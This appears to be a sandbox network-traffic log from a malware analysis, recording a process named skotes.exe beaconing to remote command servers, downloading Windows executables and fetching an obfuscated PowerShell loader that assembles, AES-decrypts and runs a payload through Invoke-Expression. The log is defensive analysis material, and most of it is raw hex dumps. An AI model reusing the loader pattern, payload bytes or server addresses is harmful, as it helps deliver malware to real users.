00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL;.gJ@JH@T0h1 >@.rsrc N@.idata 0N@ +@P@ytlmplcn`P0ZR@gdxiagsiJ@.taggant0J"@
Nov 12, 2024 00:07:07.864177942 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:07.864183903 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:07.864228010 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:07.864238977 CET	1236	IN	Data Raw: 98 3a 8c 45 e4 1c 31 c7 39 56 b3 fb e2 5a 16 fd f2 d6 82 11 57 43 c9 9d d6 96 24 32 b7 ef ef 27 ef e2 63 50 d5 ef 5d af 0f fd 8e 77 d5 20 fe d1 d6 96 9e 5d 0b 5a d6 c7 39 f4 04 77 c8 3f e2 90 a8 91 71 de 4e 97 f0 77 4c db a5 69 8e a1 de c4 4c a2 Data Ascii: :E19VZWC$2'cP]w ]Z9w?qNwLiLww{omuNid<B}v(/_=@S}a~LreEH<Zv$\|l"l0S);-#&/h?J7
Nov 12, 2024 00:07:07.864253044 CET	1236	IN	Data Raw: ef 57 68 89 ee e0 10 af 67 b8 47 3b 05 fe 5f b6 12 93 f3 cf 05 a2 a5 7a 12 ea a5 7e f0 da 81 44 99 41 ef 7c f4 72 bc d3 b5 2d 47 01 3f be 74 b7 f7 f4 43 8e 96 e2 33 b7 73 05 86 f6 13 40 e4 81 8b 30 e3 08 bc 4b c9 66 bc 18 f4 c7 93 45 68 11 d4 8b Data Ascii: WhgG;_z~DA\|r-G?tC3s@0KfEhZtJkw"EM6>r<gZO{>\s"D{>n5rZo=,g'7HaVT0wo4{~8=(K!
Nov 12, 2024 00:07:07.864273071 CET	1236	IN	Data Raw: d7 88 25 5a 29 1b 77 ef c4 9b 0b 90 a8 9d 9f 80 a6 a3 af ef 31 31 93 af bc 5a 34 bb 0e 56 e3 4c 3c 5b 16 ab aa f5 dd 3b 96 e0 8f 29 3c 5f 1b 71 87 c5 d3 76 8e 71 5f d1 c6 fe 55 f7 17 5c 76 1f b9 21 f5 cd a4 7f 7b 8c e5 3b 3b 86 75 2d a0 83 56 03 Data Ascii: %Z)w11Z4VL<[;)<_qvq_U\v!{;;u-VOw,hS[[E77:<GTs7=t>g*#yl!oDZskD<i9B+'%@'&nhNQ){<H4>$(C&/
Nov 12, 2024 00:07:07.864288092 CET	1236	IN	Data Raw: 11 83 9c 7a 4c a7 89 0e 61 53 f3 3e 02 e0 d7 ad 39 c9 0d e2 44 03 ce 08 8c 54 26 34 af 13 9a d9 d9 9e 38 f6 e6 05 3b d5 8e f1 25 1c d0 b5 09 91 d6 f2 4a 43 b3 60 04 c2 86 22 f9 b5 c4 34 e3 83 2f c9 c1 c1 8c f1 a0 dc a7 0f e4 4a 1a 7f 17 4c f6 9b Data Ascii: zLaS>9DT&48;%JC`"4/JL:Oi@v[&zmkaxpg${h.X GTHUIQg_U@,7Hbn_kN){sng/r,whOi<
Nov 12, 2024 00:07:07.864298105 CET	248	IN	Data Raw: 26 36 5f 1a 72 b8 de 95 38 58 db 7f 38 fa a4 c3 ab 4c 26 d4 93 4d 93 b5 0c ff 82 5b 0f fc ae e4 00 df 26 e6 4e a5 a2 38 1c df 37 1f ce 9d 9e 17 44 bc e0 7e 20 03 c1 cb 07 f6 be 57 aa 13 8d ef 91 5f 39 ac e8 f9 56 c0 42 07 e3 ef da c5 ca ef d2 13 Data Ascii: &6_r8X8L&M[&N87D~ W_9VBy$3^0488T*%!L483/5ZOqgv;7d)4v([:Y&RM+YhuL;49HV#/pXZ`C
Nov 12, 2024 00:07:07.864309072 CET	1236	IN	Data Raw: 89 a1 51 03 59 21 d3 ae 21 56 b7 82 0c 67 5f d4 33 43 5e 8b ee 15 43 a2 d2 e0 67 28 82 58 82 d3 cd 03 f2 b8 bb de fd dd 7b e3 0b db 50 ea 22 20 96 eb a6 d0 ec f5 3b d4 d6 c2 80 fa 8a b7 89 35 3c de e0 16 df d3 05 f7 55 53 e9 20 d4 1a be 00 99 14 Data Ascii: QY!!Vg_3C^Cg(X{P" ;5<US }WA)7[gwJA[S;RM'A9ysO3r/UwP'\\<Zuy,/[b18_S?bUvBg},M#08=<
Nov 12, 2024 00:07:07.864327908 CET	1236	IN	Data Raw: d9 ae b0 6a cc 54 b7 cb e2 5b eb e7 62 f7 43 75 15 c2 6b 76 ed 60 e4 05 4b e3 bb ab 97 56 7c c0 bc 16 c4 a9 1e 1f ef 23 b9 da 5d f1 ed f2 ca 9f d4 4e 95 43 d4 4d 66 21 db 85 5b 6f c5 3b 4e 59 4c 52 ce 69 82 be 39 c8 7f df 29 b5 85 e6 c8 23 d7 f6 Data Ascii: jT[bCukv`KV\|#]NCMf![o;NYLRi9)#asy3^0'Lo`^";53!ejzzs=PcDThZ$I+z;br}bdv H%OtVH;JbP6h
Nov 12, 2024 00:07:07.864356995 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:07 GMT Content-Type: application/octet-stream Content-Length: 1888768 Last-Modified: Mon, 11 Nov 2024 22:04:59 GMT Connection: keep-alive ETag: "67327f8b-1cd200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 3b a0 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 be 03 00 00 c2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 48 a9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL;.gJ@JH@T0h1 >@.rsrc N@.idata 0N@ +@P@ytlmplcn`P0ZR@gdxiagsiJ@.taggant0J"@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	50242	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:10.340925932 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 36 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005627001&unit=246122658369
Nov 12, 2024 00:07:11.134398937 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	50245	31.41.244.11	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:11.150954962 CET	54	OUT	GET /files/k4pDgO.ps1 HTTP/1.1 Host: 31.41.244.11
Nov 12, 2024 00:07:11.780261040 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:11 GMT Content-Type: application/octet-stream Content-Length: 11165 Last-Modified: Mon, 11 Nov 2024 17:10:13 GMT Connection: keep-alive ETag: "67323a75-2b9d" Accept-Ranges: bytes Data Raw: 24 64 65 63 6f 64 65 64 20 3d 20 27 27 0d 0a 24 65 45 35 4e 75 30 43 54 63 69 65 6c 20 3d 20 27 23 20 49 33 33 33 36 35 32 67 73 61 35 31 32 33 31 33 0d 0a 24 4b 65 79 20 3d 20 22 41 50 76 53 33 65 47 42 33 46 4f 48 36 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 65 45 35 4e 75 30 43 54 63 69 65 6c 0d 0a 24 53 6f 66 6f 31 7a 30 7a 6c 69 33 36 20 3d 20 27 6d 65 72 47 34 6c 33 77 50 4f 6d 7a 43 33 32 42 4b 58 5a 42 74 32 44 56 38 66 68 49 2b 63 3d 22 0d 0a 24 49 56 20 3d 20 22 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 53 6f 66 6f 31 7a 30 7a 6c 69 33 36 0d 0a 24 49 33 6f 55 54 6f 54 61 6f 73 4f 4b 20 3d 20 27 56 4d 51 43 38 74 2b 4f 61 6a 35 4e 77 74 44 46 35 47 67 61 35 77 3d 3d 22 0d 0a 24 45 6e 63 72 79 70 74 65 64 20 3d 20 22 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 49 33 6f 55 54 6f 54 61 6f 73 4f 4b 0d 0a 24 57 68 66 35 4c 76 33 59 49 62 6c 53 20 3d 20 27 54 7a 36 4c 6d 57 51 36 6e 38 70 2b 38 31 6c 72 43 6f 67 6c 59 4a 69 42 45 45 72 49 36 61 71 6b 65 44 70 7a 54 71 53 51 27 0d [TRUNCATED] Data Ascii: $decoded = ''$eE5Nu0CTciel = '# I333652gsa512313$Key = "APvS3eGB3FOH6'$decoded += $eE5Nu0CTciel$Sofo1z0zli36 = 'merG4l3wPOmzC32BKXZBt2DV8fhI+c="$IV = "'$decoded += $Sofo1z0zli36$I3oUToTaosOK = 'VMQC8t+Oaj5NwtDF5Gga5w=="$Encrypted = "'$decoded += $I3oUToTaosOK$Whf5Lv3YIblS = 'Tz6LmWQ6n8p+81lrCoglYJiBEErI6aqkeDpzTqSQ'$decoded += $Whf5Lv3YIblS$PHpVQ9WAr9oq = 'rHvZ4fyCGPN6VzV+1QjLSPyjpoVrsih2tZI3PBx6'$decoded += $PHpVQ9WAr9oq$GbvE9I5t9cwY = 'eH2GVW1qSswGSjOAbzIYRDSMKEbpjkEzk7oeqjCa'$decoded += $GbvE9I5t9cwY$hF8rOACYSSGs = 'bXp7Y7/BV5yjaT+y8rs0Owoh+HaBfbnjgEaq9puc'$decoded += $hF8rOACYSSGs$zQbdywfjvYWn = 'fZY2Rxfid+pGHy0klAKX90OYmEekYiRJM+pqD3A6'$decoded += $zQbdywfjvYWn$3m8hArU01mEs = 'bK/gbxp9CkJfmXWIPIJIbJ1OMLOuWfCZZiC3KdYg'$decoded += $3m8hArU01mEs$InFdKJMws0Tl = '1U615L1g14M9U07vMEvlC/lXNavZyFSUbSacl/Ft'$decoded += $InFdKJMws0Tl$OMPzFPvPQeEn = 'l9WyTcbr8y5epVLAzN/V7fVMYpg7rbSBLxiOL1te'$decoded += $OMPzFPvPQe
Nov 12, 2024 00:07:11.780275106 CET	1236	IN	Data Raw: 45 6e 0d 0a 24 63 4b 75 41 32 61 57 5a 57 32 51 65 20 3d 20 27 62 30 67 57 62 73 49 6d 34 64 32 54 6b 47 66 74 71 62 4e 4c 73 42 4d 44 56 58 4e 72 59 4d 63 6c 6b 64 74 64 4c 58 6a 64 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 63 4b 75 41 32 Data Ascii: En$cKuA2aWZW2Qe = 'b0gWbsIm4d2TkGftqbNLsBMDVXNrYMclkdtdLXjd'$decoded += $cKuA2aWZW2Qe$hNGpfqNCq6mR = 'G21erX2WNtt74GQhht9dBe2QrqK/ttS5L+zSldVm'$decoded += $hNGpfqNCq6mR$lhKaErjeaeIH = '7CgCQ7ME7LYqpiC2f0dwRcigxYBqIr7QL9iDlsN8'$deco
Nov 12, 2024 00:07:11.780287027 CET	1236	IN	Data Raw: 3d 20 27 65 4e 4c 77 6f 5a 42 58 79 7a 30 32 56 53 73 69 63 6b 75 67 47 2f 39 37 76 31 48 70 62 79 4f 55 35 55 65 75 74 62 39 47 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 30 69 58 4a 77 6b 4b 58 78 79 6e 49 0d 0a 24 57 6a 46 4c 39 57 6b 51 Data Ascii: = 'eNLwoZBXyz02VSsickugG/97v1HpbyOU5Ueutb9G'$decoded += $0iXJwkKXxynI$WjFL9WkQL2dt = '5wBxJB7/RIdTLarqnq92c5V9FHxadlwaKbS9DzWg'$decoded += $WjFL9WkQL2dt$0c4jPpdYNXdN = 'TXjkKWo72VQ/w5aT95tod400qe21ONTO5XVjywJe'$decoded += $0c4jPpdYNX
Nov 12, 2024 00:07:11.780297041 CET	636	IN	Data Raw: 61 45 49 2f 48 6c 36 72 76 35 55 32 73 6a 5a 6d 6f 75 64 55 42 7a 33 6e 38 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 6d 49 43 4c 4f 50 31 35 46 51 53 43 0d 0a 24 6d 76 4a 64 73 4a 76 73 6e 39 73 65 20 3d 20 27 38 37 57 4c 53 6b 50 32 50 6d Data Ascii: aEI/Hl6rv5U2sjZmoudUBz3n8'$decoded += $mICLOP15FQSC$mvJdsJvsn9se = '87WLSkP2PmkL+RbIqhLG2hRlYGvaKzttxQFaojDO'$decoded += $mvJdsJvsn9se$1ahRQ5KIeCtl = '/4xwNgT7u1GxOtQaK4tYqrTps7JFVYJZuvWmID4P'$decoded += $1ahRQ5KIeCtl$3c6QZDs7uwbh
Nov 12, 2024 00:07:11.780332088 CET	1236	IN	Data Raw: 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 4b 42 46 52 49 34 44 30 79 38 4c 71 0d 0a 24 46 77 75 65 51 56 7a 58 30 6b 62 6e 20 3d 20 27 36 72 6f 4f 6e 30 68 67 34 61 31 48 79 35 73 50 4a 79 72 6b 37 38 76 4e 70 35 57 36 63 4d 7a 61 42 2b 45 62 59 Data Ascii: $decoded += $KBFRI4D0y8Lq$FwueQVzX0kbn = '6roOn0hg4a1Hy5sPJyrk78vNp5W6cMzaB+EbYd11'$decoded += $FwueQVzX0kbn$ecEzXwnoJmMI = 'LmRsh2pbfJ8kMVu07qDoumE6vAVSxO5enOSeqvpr'$decoded += $ecEzXwnoJmMI$4lRt8vItbAZ6 = 'uw+9H99156/Tx53U/iXAM2PX
Nov 12, 2024 00:07:11.780343056 CET	1236	IN	Data Raw: 4f 4a 45 45 33 45 66 6b 0d 0a 24 70 6f 66 4b 6d 4c 61 30 68 58 62 4f 20 3d 20 27 55 4b 62 6d 59 2f 7a 30 68 32 4e 2f 71 62 41 59 79 67 55 53 45 4a 4a 39 5a 67 41 36 6b 34 6e 36 57 6f 57 68 68 49 53 4f 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 Data Ascii: OJEE3Efk$pofKmLa0hXbO = 'UKbmY/z0h2N/qbAYygUSEJJ9ZgA6k4n6WoWhhISO'$decoded += $pofKmLa0hXbO$nRZsehtqCQtQ = 'Hu0YQpiJgEHE534WD3+el6uYS275HjbnIcErmxSy'$decoded += $nRZsehtqCQtQ$x0CTMVprx515 = 'c62V89Es+WB+6BwCkVTUgtPRNZ2j7X6NBiDtgChA'
Nov 12, 2024 00:07:11.780354977 CET	1236	IN	Data Raw: 36 68 54 6c 7a 20 3d 20 27 53 45 35 74 32 39 32 63 61 67 6f 32 76 77 41 69 72 2b 46 6e 4e 6a 47 55 2f 41 37 38 6b 68 66 58 6c 67 6d 78 35 53 66 4e 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 61 78 39 7a 54 50 42 36 68 54 6c 7a 0d 0a 24 34 76 Data Ascii: 6hTlz = 'SE5t292cago2vwAir+FnNjGU/A78khfXlgmx5SfN'$decoded += $ax9zTPB6hTlz$4v2mEqbE26tD = 'z86ENH212ObeJ5N4ygrO3gx38UcTt9SjXAIGz0Qi'$decoded += $4v2mEqbE26tD$LGCbicO9m54C = 'HEpJRfdJMMqjB4ELgz6of0sr3q3aM5goPd3jBk7g'$decoded += $LGCb
Nov 12, 2024 00:07:11.780373096 CET	636	IN	Data Raw: 42 32 39 76 61 73 79 6a 32 2f 30 77 4f 56 4d 6a 49 44 32 30 4f 48 70 63 55 6d 2f 42 63 65 79 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 73 63 51 63 71 58 34 58 4e 6c 58 69 0d 0a 24 41 52 58 6d 45 68 63 6a 39 6a 72 67 20 3d 20 27 54 79 6a 6a Data Ascii: B29vasyj2/0wOVMjID20OHpcUm/Bcey'$decoded += $scQcqX4XNlXi$ARXmEhcj9jrg = 'TyjjfPc+smTrGzrEX2nko+MqTThz89Ol9RHPRUE2'$decoded += $ARXmEhcj9jrg$FZ0ejbKN0kyi = 'gYaB39AB4j7ydVw8/IWWH6yvyDKw9PJLuX2m5DTf'$decoded += $FZ0ejbKN0kyi$2tk7zVC
Nov 12, 2024 00:07:11.780577898 CET	1236	IN	Data Raw: 46 42 54 51 27 0d 0a 24 64 65 63 6f 64 65 64 20 2b 3d 20 24 7a 6f 78 75 34 68 6b 6d 47 64 71 4e 0d 0a 24 74 70 51 76 37 47 39 4e 58 34 67 43 20 3d 20 27 63 37 31 34 5a 2f 62 46 69 6c 70 39 4e 75 39 75 4d 78 73 54 76 45 4a 69 2b 53 7a 34 59 59 67 Data Ascii: FBTQ'$decoded += $zoxu4hkmGdqN$tpQv7G9NX4gC = 'c714Z/bFilp9Nu9uMxsTvEJi+Sz4YYgfNH7F3FLR'$decoded += $tpQv7G9NX4gC$hR8BfZfu4S1n = '6YWce9GlhmYzwS6rJQEKuM6mkjHYm1MNU1ke6YeF'$decoded += $hR8BfZfu4S1n$FqGDXHDiKSPI = 'Bee3pVQQ2ByiTbeCaE
Nov 12, 2024 00:07:11.780631065 CET	1236	IN	Data Raw: 20 2b 3d 20 24 56 78 4a 4d 45 6f 6a 30 4a 4d 68 37 0d 0a 24 55 31 77 4b 37 50 59 63 31 43 61 32 20 3d 20 27 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 4b 65 79 29 0d 0a 24 69 76 42 79 74 65 73 20 3d 20 5b 43 6f 6e 76 27 0d 0a 24 64 Data Ascii: += $VxJMEoj0JMh7$U1wK7PYc1Ca2 = ':FromBase64String($Key)$ivBytes = [Conv'$decoded += $U1wK7PYc1Ca2$Kvt8oekCIi2L = 'ert]::FromBase64String($IV)$encryptedBy'$decoded += $Kvt8oekCIi2L$GNHT65Ml89Vm = 'tes = [Convert]::FromBase64Stri
Nov 12, 2024 00:07:11.785301924 CET	270	IN	Data Raw: 24 37 4d 7a 43 73 5a 45 6d 77 47 6e 54 0d 0a 24 4b 5a 33 53 71 69 79 66 42 39 64 4a 20 3d 20 27 38 2e 47 65 74 53 74 72 69 6e 67 28 24 64 65 63 72 79 70 74 65 64 42 79 74 65 73 29 0d 0a 0d 0a 23 20 46 64 67 33 31 67 73 61 27 0d 0a 24 64 65 63 6f Data Ascii: $7MzCsZEmwGnT$KZ3SqiyfB9dJ = '8.GetString($decryptedBytes)# Fdg31gsa'$decoded += $KZ3SqiyfB9dJ$HoT93MnsWZn0 = 'dasu3AInvoke-Expression $decryptedScrip'$decoded += $HoT93MnsWZn0$q9Z0O4YO7GOV = 't'$decoded += $q9Z0O4YO7GOVI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50250	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:13.356543064 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 35 36 32 38 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005628041&unit=246122658369
Nov 12, 2024 00:07:13.996120930 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50259	185.215.113.43	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:18.266637087 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 35 36 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1005637001&unit=246122658369
Nov 12, 2024 00:07:18.906769037 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50263	185.215.113.16	80	9164	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 00:07:18.917684078 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 12, 2024 00:07:19.589236021 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 23:07:19 GMT Content-Type: application/octet-stream Content-Length: 3161088 Last-Modified: Mon, 11 Nov 2024 22:52:43 GMT Connection: keep-alive ETag: "67328abb-303c00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 40 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 30 00 00 04 00 00 1a 1d 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ@0@p01@Th@ @.rsrc@@.idata @cwahjnig**@dpfgpfkz000@.taggant0@0"0@
Nov 12, 2024 00:07:19.589296103 CET	212	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:19.589307070 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:19.589318991 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:19.589332104 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 12, 2024 00:07:19.589344025 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b 76 af cd 9d bb cd 7c 7e 4f a4 f8 68 cd 50 86 ab e5 cb dc 4a e9 c5 fb 5a 70 d7 08 2d 8a 6c dd 66 cd 50 19 ef c3 a4 33 d6 7d c0 88 d6 7d c0 88 ef 34 cb 70 55 1b 4d 80 64 76 49 c2 a9 Data Ascii: v\|~OhPJZp-lfP3}}4pUMdvIv<BviYKq%YN/M_n<K_eQ>APJAPBHOePhSJ>\RJ-!fJkPf*}AjpL(Nv\|o<KN
Nov 12, 2024 00:07:19.589355946 CET	1236	IN	Data Raw: 3d e9 c6 52 80 2e 49 80 18 21 f4 50 19 66 48 5b 19 fa cf cb 5d d3 88 51 0b 66 cd 50 99 e9 d1 77 74 82 e9 40 84 92 e9 00 80 92 e9 44 84 92 e9 d8 87 92 e9 48 84 92 e9 14 80 92 e9 4c 84 92 e9 60 80 52 e9 cb dc 4a e5 a8 23 4a cd 50 9e 2a e2 cf 58 fa Data Ascii: =R.I!PfH[]QfPwt@DHL`RJ#JP*XJfJpwl.I[UOfJJw}lARlP,svdAPR[gPl6JJ+QUgZNmPH-LfNbPhQePgeP,Il
Nov 12, 2024 00:07:19.589374065 CET	1236	IN	Data Raw: 39 67 cd 50 19 2c 8a 6c d1 66 0b 0c 3d b2 cd 89 dc 4a 99 50 19 66 cd 89 dc 4a f1 50 19 66 cd c7 9c 4a a0 52 19 66 76 0c 3d 5e 34 0c 3d 6e cd 50 19 66 9e 5e 2f 2f 35 0c 3d a6 cd 50 19 66 d6 40 08 66 cd c5 c4 4a e9 41 53 67 48 93 1c ef b1 6c 3d ee Data Ascii: 9gP,lf=JPfJPfJRfv=^4=nPf^//5=Pf@fJASgHl=IlhPBpfPC,l%f4=Pf4=RPfr<PKfp=J"P&JYJPfAPKfp<=JpR w[nHl=xf4=FPf4=RPfr<PKfvwPf>Tewt=
